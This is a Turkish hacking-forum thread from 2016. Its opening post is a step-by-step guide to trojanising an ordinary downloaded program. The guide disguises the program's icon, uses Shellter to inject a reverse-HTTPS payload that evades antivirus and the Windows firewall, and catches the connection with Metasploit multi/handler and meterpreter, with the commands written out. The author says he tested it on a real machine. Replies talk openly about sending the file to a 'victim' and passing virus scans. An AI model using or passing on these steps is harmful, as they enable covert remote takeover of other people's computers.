İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Anti-Virus Atlatma, Icon Değişimi ve Shellter Kullanımı

16-02-2016 23:30
#1
Jaganvir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
stalker
Mesajlar:
292
Teşekkür (Etti):
37
Teşekkür (Aldı):
34
Konular:
27
Merhaba arkadaşlar forumda "shellter" ile ilgili bir konu görmediğim ve programı güzel bulduğum için paylaşmak istedim.

İlk önce programın ne olduğundan bahsetmek istiyorum.
Program, yaptığınız payload' ı bazı anti-virüsler'den atlatmaya yarıyor. Dikkat edin bazı diyorum çünkü oluşturğunuz payload' ı direk olarak bu program ile kullanırsanız bazı anti-virüs'lerden kaçamıyor. Sonuç
:



Gördüğünüz gibi.

Yukarıdaki sonucu görünce pek tatmin olmadım ve bu "shellter" programını gezginlerden indirdiğim sıradan bir program' da denedim. Sonuç:



Gördüğünüz gibi.


Bu işler biraz da sizin hayal gücünüze bağlı Deneme yanılma yöntemiyle sizler daha iyisini yapacaksınızdır.
Ve unutmadan söyleyeyim aynı zamanda windows güvenlik duvarına' da takılmadan ilerliyorsunuz. Win10' da denedim
.


Artık yavaştan nasıl kullanıldığını anlatayım.

İlk önce kurbanınıza göre, uygun bir program indirin. Veya herhangi bir program indirdikten sonra .exe icon eğiştirici ek program'lar yardımıyla'da casus yazılımınıza istediğiniz şekli verirsiniz. Mesela: "IcoFX" programı ile icon değiştirebilirsiniz.
Ben rastgele bir program seçtim.




İşlemlerimize başlamadan önce "apt-get install shellter" komutu ile asıl programımızı indiriyoruz.
Ardından "shellter" komutunu veriyoruz. Ve bize bir hata ile bir dizin verecek. "/usr/share/shellter/shellter.exe" bu yola gideceğiz ve .exe' mizi masaüstüne atacağız.




Ardından "cd Desktop" komutunu verip. "wine shellter.exe" komutunu veriyoruz. Benim seçtiğim yeri seçip konsola yapıştırın.




Uzun sayılabilecek bir süre bekledikten sonra tekrar "wine shellter.exe" komutunu veriyoruz. Bu sefer açılmış olacaktır.


NOT:En başta gezginler' den indirdiğiniz o programı masaüstüne atın ve eğer terminal masaüstü' de açık değilse terminalde masaüstünü açın.


Bize otomatik mi manuel mi olsun diye soruyor. "a" diyoruz.
İndirdiğimiz programın adını yazıyoruz.




Sorduğu soruya "l" diyoruz.
Sıradaki soruya da "3" diyoruz. Siz benim anlattıklarımla sınırlı kalmayın deneme yanılma yöntemiyle diğer seçenekleride kullanın. Bu şekilde programı daha verimli kullanabilirsiniz.
Sıradaki soruda LHOST adresiminizi soruyor. konsola "ifconfig" yazarak öğrenebilirsiniz.
Sıradaki soruda ise LPORT adresimizi soruyor. biz https protokolünü seçtiğimiz için "8443" diyoruz. Şayet ki http seçseydik 8080 yazacaktık. Siz de TCP yaparak nasıl olduğuna bakın. Dediğim gibi deneme yanılma yöntemleri en iyi öğrenme şekillerindendir.



Evet shellter ile işimiz bitti.



Sırada Bizim Meşhur M.e.t.a.s.p.l.o.i.t Var


M.e.t.a.s.p.l.o.i.t' i açıp:

"use exploit/multi/handler"
yazarak "multi/handler" exploit' ine giriyoruz.
"set payload windows/meterpreter/reverse_https"
"set exitfunc thread"
"set lhost 192.168.2.186" buraya kendi lhost adresimizi girmeyi öğrenmiştik.
"show options" ile bilgilerimizi kontrol ediyoruz.
"exploit" ve son olarak exploit ettik ve bağlantının gelmesini bekliyoruz.




Evet gördüğünüz gibi hedef sistemimizin işletim sistemi win10, güvenlik duvarı açık ve renkler yeşil



Evet bağlantımız geldi.
Galiba renklerin yeşil olması bir şeyi değiştirmiyor ?









Asıl programın internet adresi: https://www.shellterproject.com/
Bunları yaparken sanal makine kullanmadım hedef sistem fiziksel bir bilgisayardı.
Bazı ekran görüntülerinde farklı kali sürümü var. Shellter' ın nasıl kurulduğunu göstermek için live olarak başlattım. Siz ona aldırmayın.

Arkadaşlar bazı yerlerde elbette yanlışlarım olmuştur. Yanlışlarımı fark edenler bana bildirebilir. Sadece paylaşıp yardımcı olmak istedim anlatım tümüyle bana aittir.

Düzgün bir anlatım yapmak istedim. Umarım yapabilmişimdir. Bir teşekkürü çok görmeyin
demonline, SerdarCoruk Teşekkür etti.

17-02-2016 12:20
#2
LeTTa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hawaii
Mesajlar:
1.526
Teşekkür (Etti):
93
Teşekkür (Aldı):
28
Konular:
472
ben serverimi adama attıgımda vriüs tarayıcısı uyarı verirmi ? yoksa sadece site taramaları içinmi geçerli ?
Kullanıcı İmzası
1881 - 193∞
MUSTAFA KEMAL ATATÜRK
Ey büyük Atatürk!
Açtığın yolda, gösterdiğin hedefe durmadan yürüyeceğime ant içerim!
Varlığım Türk varlığına armağan olsun!
17-02-2016 18:18
#3
Jaganvir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
stalker
Mesajlar:
292
Teşekkür (Etti):
37
Teşekkür (Aldı):
34
Konular:
27
Alıntı:
LeTTa´isimli üyeden Alıntı Mesajı göster
ben serverimi adama attıgımda vriüs tarayıcısı uyarı verirmi ? yoksa sadece site taramaları içinmi geçerli ?
vermez
19-02-2016 15:37
#4
Mshrn - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
İstanbul
Mesajlar:
6
Teşekkür (Etti):
2
Teşekkür (Aldı):
1
Konular:
1
Başgan kusura bakma ama ben tam anlamadım ben bu yöntem ile kendi oluşturduğum trojanı kullansam virus taramasında atlatabilirmiyim?
19-02-2016 18:06
#5
Jaganvir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
stalker
Mesajlar:
292
Teşekkür (Etti):
37
Teşekkür (Aldı):
34
Konular:
27
Alıntı:
Mshrn´isimli üyeden Alıntı Mesajı göster
Başgan kusura bakma ama ben tam anlamadım ben bu yöntem ile kendi oluşturduğum trojanı kullansam virus taramasında atlatabilirmiyim?
senin trojan oluştumana bile gerek yok. gezginler' den herhangi bir program indir ve dediklerimi yap.
19-02-2016 18:07
#6
Jaganvir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
stalker
Mesajlar:
292
Teşekkür (Etti):
37
Teşekkür (Aldı):
34
Konular:
27
Alıntı:
Mshrn´isimli üyeden Alıntı Mesajı göster
Başgan kusura bakma ama ben tam anlamadım ben bu yöntem ile kendi oluşturduğum trojanı kullansam virus taramasında atlatabilirmiyim?
fotoğrafta görüyorsun zaten 80 tane anti-virüsün sadece 4'ünden geçemedi.
19-02-2016 18:48
#7
Üyelik tarihi:
08/2015
Nereden:
Ankara
Yaş:
7
Mesajlar:
1.187
Teşekkür (Etti):
552
Teşekkür (Aldı):
201
Konular:
51
Ellerine sağlık kardeşim çok güzel anlatmışsın
19-02-2016 21:58
#8
Jaganvir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
stalker
Mesajlar:
292
Teşekkür (Etti):
37
Teşekkür (Aldı):
34
Konular:
27
Alıntı:
SerdarCoruk´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık kardeşim çok güzel anlatmışsın
Rica ederim
24-02-2016 14:53
#9
Mshrn - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
İstanbul
Mesajlar:
6
Teşekkür (Etti):
2
Teşekkür (Aldı):
1
Konular:
1
Cevapların için çok teşekkür ederim hemen şimdi bi deneyeceğim yanlız live olarak kullanıyorum sıkıntı olurmu acaba?
25-02-2016 07:23
#10
Jaganvir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
stalker
Mesajlar:
292
Teşekkür (Etti):
37
Teşekkür (Aldı):
34
Konular:
27
Alıntı:
Mshrn´isimli üyeden Alıntı Mesajı göster
Cevapların için çok teşekkür ederim hemen şimdi bi deneyeceğim yanlız live olarak kullanıyorum sıkıntı olurmu acaba?
olmaz sadece bilgisaarı her açtığında programı kurman gerekir bu kadar.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı